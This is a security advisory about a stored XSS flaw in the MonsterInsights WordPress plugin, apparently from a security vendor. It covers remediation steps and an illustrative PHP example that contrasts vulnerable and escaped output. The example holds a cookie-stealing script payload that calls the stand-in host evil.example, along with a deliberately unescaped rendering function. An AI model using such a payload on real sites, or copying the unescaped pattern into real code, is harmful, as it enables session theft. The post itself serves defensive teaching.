XSS Vulnerability in MonsterInsights – Google Analytics Dashboard for WordPress Plugin Hits +3 Million Websites

A stored Cross-Site Scripting (XSS) vulnerability in MonsterInsights plugin versions <= 8.14.0 affects up to 3+ million websites

The U.S. National Vulnerability Database (NVD) recently announced that the MonsterInsights – Google Analytics Dashboard for WordPress plugin, versions <= 8.14.0, is vulnerable to Cross-Site Scripting (XSS). The WordPress security company Patchstack discovered the vulnerability and published the following details:

Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Google Analytics by Monster Insights Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site.

This vulnerability has been fixed in version 8.14.1.

Recommended Action

If you are still running MonsterInsights version 8.14.0 or earlier, update the plugin immediately to the latest version, or at least to version 8.14.1.

The vulnerability was patched in version 8.14.1, and the plugin developers wrote the following in the changelog on WordPress.org:

8.14.1: APR 11, 2023
Fixed: We fixed a PHP warning error and added additional security hardening.

The changelog only says “added additional security hardening”; it does not disclose that the release fixes an XSS vulnerability in the plugin. Site owners who triage updates by reading changelogs could therefore skip or postpone this one. Do not rely on changelog wording to judge the urgency of a plugin update; check the NVD entry or the Patchstack advisory for the version you are running.

What is Stored Cross-Site Scripting (XSS) vulnerability?

Cross-Site Scripting is listed by the Open Web Application Security Project among its Top 10 security risks for web applications. OWASP defines Cross-Site Scripting (XSS) as:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

Stored XSS Attacks

Stored XSS attacks are those where the injected script is persisted on the target server (in a database, forum post, comment, log, etc.). Every visitor who loads the affected page then receives the malicious script from the site itself, so it runs in each victim's browser without any further action by the attacker. Depending on who views the page, this can lead to user data theft or, when an administrator is targeted, a full site takeover through actions performed with the administrator's session.

The MonsterInsights – Google Analytics Dashboard for WordPress plugin was found to have the stored variant of the vulnerability, and it is installed on more than 3 million WordPress websites, which makes the issue more concerning.
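The page does not state which field or output location in MonsterInsights was affected, so the following is a generic illustration of the stored XSS pattern described above in WordPress-style plugin code, not a reproduction of the MonsterInsights bug and not the plugin's own code. It is an added example: the option name `ga_property_id`, the payload and the ID format check are constructed for the illustration, and plain PHP functions are used so it runs with the `php` CLI; the comments name the WordPress equivalents a plugin would call instead.

```php
<?php
// Added example (not MonsterInsights code): generic stored-XSS pattern in a
// WordPress-style settings page. A plugin saves an admin-supplied option and
// later echoes it back into page markup. The option name "ga_property_id",
// the payload and the ID pattern below are constructed for this illustration.

declare(strict_types=1);

// Constructed attacker input: what gets persisted when the settings form (or a
// request that bypasses its capability/nonce checks) stores an unvalidated value.
// In a real plugin this is what get_option('ga_property_id') would return.
const STORED_VALUE = 'UA-123"><script>document.location="https://evil.example/?c="+document.cookie</script>';

// Vulnerable pattern: the stored value is concatenated straight into an HTML
// attribute. The payload closes the attribute and injects a live <script> tag
// that every viewer of this page executes.
function render_settings_vulnerable(string $value): string
{
    return '<input type="text" name="ga_property_id" value="' . $value . '">';
}

// Hardened pattern 1: escape on output for the context the value lands in.
// WordPress equivalents: esc_attr() for attributes, esc_html() for text nodes.
function render_settings_hardened(string $value): string
{
    $escaped = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="ga_property_id" value="' . $escaped . '">';
}

// Hardened pattern 2: when the value is handed to an inline script, encode it
// as JSON with HTML-safe flags so "<", ">", "&" and quotes cannot terminate the
// script block. WordPress equivalent: wp_json_encode().
function render_inline_script_hardened(string $value): string
{
    $json = json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
    return '<script>var gaProperty = ' . $json . ';</script>';
}

// Input-side validation: only accept something shaped like a property ID
// before it is ever stored (pattern is an assumption for this example).
// WordPress: sanitize_text_field() plus this check inside the sanitize
// callback passed to register_setting(). Output escaping is still required;
// validation is defense in depth, not a substitute.
function sanitize_property_id(string $raw): ?string
{
    $trimmed = trim($raw);
    return preg_match('/^(UA-\d{4,10}-\d{1,4}|G-[A-Z0-9]{4,12})$/', $trimmed) === 1
        ? $trimmed
        : null;
}

// Render the same stored value through the vulnerable and hardened paths so
// the difference is visible side by side.
echo "vulnerable attribute:\n", render_settings_vulnerable(STORED_VALUE), "\n\n";
echo "hardened attribute:\n", render_settings_hardened(STORED_VALUE), "\n\n";
echo "hardened inline script:\n", render_inline_script_hardened(STORED_VALUE), "\n\n";

// The payload is rejected at input; a well-formed ID passes through unchanged.
var_dump(sanitize_property_id(STORED_VALUE));
var_dump(sanitize_property_id('G-ABC123DEF4'));
```

The point to take from the two hardened renderers is that escaping must match the output context: attribute escaping does not make a value safe inside a `<script>` block, and vice versa. Validating the value on the way in narrows what an attacker can store, but the fix for a stored XSS is always the escaping at the sink, because the same stored value may later be rendered somewhere the validation author did not anticipate.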

How to fix MonsterInsights – Google Analytics Dashboard for WordPress Vulnerability for your site

  1. Update the MonsterInsights – Google Analytics Dashboard for WordPress plugin to the latest version, or at least to version 8.14.1.
  2. Review all user accounts, especially administrators, in your WordPress dashboard and remove any you do not recognize. Change the passwords of all administrator accounts and rotate the WordPress salts (the AUTH_KEY / SALT constants in wp-config.php), which invalidates every existing login cookie.
  3. If you are running an e-commerce or membership site, ask all your users to change their passwords.
  4. Run a full website malware scan to make sure the site has not been compromised.
  5. In case the site is infected, you can engage our security team for professional website cleanup.
